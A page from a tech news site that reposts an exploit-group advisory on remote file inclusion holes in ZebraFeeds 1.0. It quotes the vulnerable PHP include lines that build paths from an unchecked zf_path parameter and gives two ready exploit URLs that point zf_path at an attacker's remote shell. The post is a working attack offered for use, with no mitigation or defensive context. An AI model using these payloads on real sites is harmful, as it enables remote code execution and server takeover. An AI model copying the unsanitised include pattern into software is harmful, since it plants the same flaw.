07.20.2008
Navigation:
Main Page
Technology
Downloads
Security
Entertainment
Videos
Search Site:
Advanced
Login
Register
News Item
ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities
Feb 18 2007 13:25:45
Source:
ace
+3
To ConTacT mE @ wWw.Asb-May.net/bb
ScRiPt:-http://cazalet.org/zebrafeeds/releases/zebrafeeds-current.zip
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}>>
******************************************************************************
aggregator.php:-
require_once($zf_path .
'includes/feed.php');
require_once($zf_path . 'includes/view.php');
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'magpierss/rss_fetch.inc');
controller.php:-
require_once($zf_path . 'includes/template.php');
require_once($zf_path .
'includes/opml.php');
********************************************************************************
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/aggregator.php?zf_path=[Shell]
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/controller.php?zf_path=[Shell]
*******************************************************************************
.
» full story @ source-link:
ace
Related Articles:
»
Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit
»
S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit
»
PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit
»
SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion Vulnerability
Comments
Add Comment
You must be registered and logged in to add comments!
Register
Login
Sponsors
Sponsors
Addict
3
d.org (c) 2002 - 2008 -
About US
-
Contact US
